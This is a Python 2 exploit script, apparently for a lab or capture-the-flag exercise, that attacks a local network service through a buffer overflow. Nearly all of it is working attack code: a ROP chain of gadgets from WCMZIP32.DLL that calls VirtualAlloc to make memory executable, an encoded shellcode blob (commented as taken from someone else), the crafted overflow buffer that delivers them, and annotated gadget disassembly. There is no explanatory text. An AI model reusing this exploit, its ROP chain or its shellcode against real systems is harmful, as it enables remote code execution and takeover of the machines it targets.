import socket
import struct
import random, string
import time

def randomword(length):
    return ''.join(random.choice(string.letters) for i in range(length))

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 8888))
sock.send(struct.pack('<I', 0x41424344))
a=sock.recv(100)
print a

            # EAX = ptr to &VirtualAlloc()
            # ECX = flProtect (0x40)
            # EDX = flAllocationType (0x1000)
            # EBX = dwSize
            # ESP = lpAddress (automatic)
            # EBP = POP (skip 4 bytes)
            # ESI = ptr to JMP [EAX]
            # EDI = ROP NOP (RETN)
            # + place ptr to "jmp esp" on stack, below PUSHAD


rop_pivot2 = [
    0x1000b557,  # POP EAX # RETN [WCMZIP32.DLL]
    0x10017000,  # writable                                              .
    0x10009295,  # MOV EDX,DWORD PTR SS:[ESP+1C]
    0x100092B0,  # RET to EDI
    0x10017000,  # writable   to ESI
    0x1000C49B,  # CALL ESI to EBP
    0x00000001,  # rop+= 0x00000001-> to ebx
    0x10006C4F,  # add esp, 14 -ret
    0x44444444,
    0x45454545,
    0x1000,      # a edx

    0x100092B0,  # RET
    0x100092B0,  # RET
    0x100092B0,  # RET

    0x1000a64e,  # POP ECX # RETN [WCMZIP32.DLL]
    0x40,        # a ECX
    0x1000b557,  # POP EAX # RETN [WCMZIP32.DLL]
    0x1001104c,  # ptr to &VirtualAlloc() [IAT WCMZIP32.DLL]
    0x1000E28D,  # MOV EAX, [EAX] # RETN
    0x1000AED2,  # XCHG EAX,ESI
    0x1000a64e,  # POP ECX # RETN [WCMZIP32.DLL]
    0x40,        # a ECX

    0x1000D9F6,  # pushad gadget
    0x1000853A,  # PUSH ESP-RET

]

rop = (struct.pack("<" + ("L" * len(rop_pivot2)), *rop_pivot2))

number =int( a[(a.find("is = ")+5):(a.find("\n"))])

print "NUMBER",number

#choreado de GUS DS
shellcode = "\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1" \
            "\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" \
            "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" \
            "\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1" \
            "\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3" \
            "\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6" \
            "\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc" \
            "\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f" \
            "\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c" \
            "\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12" \
            "\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40" \
            "\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f" \
            "\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78" \
            "\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5" \
            "\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92" \
            "\xb8\x7f"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', number))

fruta= randomword(0x3000)

print "%r"%fruta

a=sock.recv(512)

fruta= struct.pack("<L",0x0)\
       + struct.pack("<L",0xffffffff)\
       + struct.pack("<L",0x3000)\
       +  9308 * "A" \
       + struct.pack("<L",0x100064D1)\
       + struct.pack("<L",0x1000702F) * 5\
       + struct.pack("<L",0x10017008)\
       + struct.pack("<L",0x90909090)\
       + struct.pack("<L",0x10007634)\
       + struct.pack("<L",0x100076D3) * 20\
       + rop + "\x90"*10 + shellcode+ "A"* 0x3000





sock.send(fruta)
sock.close()















# #choreado de GUS DS
# shellcode = "\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1" \
#             "\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" \
#             "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" \
#             "\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1" \
#             "\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3" \
#             "\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6" \
#             "\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc" \
#             "\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f" \
#             "\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c" \
#             "\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12" \
#             "\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40" \
#             "\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f" \
#             "\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78" \
#             "\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5" \
#             "\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92" \
#             "\xb8\x7f"


# 100064D1    8B7424 08       MOV ESI,DWORD PTR SS:[ESP+8]             ; ideal
# 100064D5    85F6            TEST ESI,ESI
# 100064D7    74 7F           JE SHORT WCMZIP32.10006558
# 100064D9    8B46 1C         MOV EAX,DWORD PTR DS:[ESI+1C]
# 100064DC    85C0            TEST EAX,EAX
# 100064DE    74 78           JE SHORT WCMZIP32.10006558
# 100064E0    8B40 08         MOV EAX,DWORD PTR DS:[EAX+8]
# 100064E3    85C0            TEST EAX,EAX
# 100064E5    74 0B           JE SHORT WCMZIP32.100064F2
# 100064E7    50              PUSH EAX
# 100064E8    8B46 28         MOV EAX,DWORD PTR DS:[ESI+28]
# 100064EB    50              PUSH EAX
# 100064EC    FF56 24         CALL DWORD PTR DS:[ESI+24]

# 10007D82    5C              POP ESP
# 10007D83    24 10           AND AL,10
# 10007D85    8B83 9C000000   MOV EAX,DWORD PTR DS:[EBX+9C]
# 10007D8B    83F8 FF         CMP EAX,-1
# 10007D8E    75 04           JNZ SHORT WCMZIP32.10007D94
# 10007D90    0BC0            OR EAX,EAX
# 10007D92    5B              POP EBX
# 10007D93    C3              RETN

# 10009295    8B5424 1C       MOV EDX,DWORD PTR SS:[ESP+1C]
# 10009299    5F              POP EDI
# 1000929A    5E              POP ESI
# 1000929B    89AC90 4E0B0000 MOV DWORD PTR DS:[EAX+EDX*4+B4E],EBP
# 100092A2    5D              POP EBP
# 100092A3    5B              POP EBX
# 100092A4    C3              RETN
#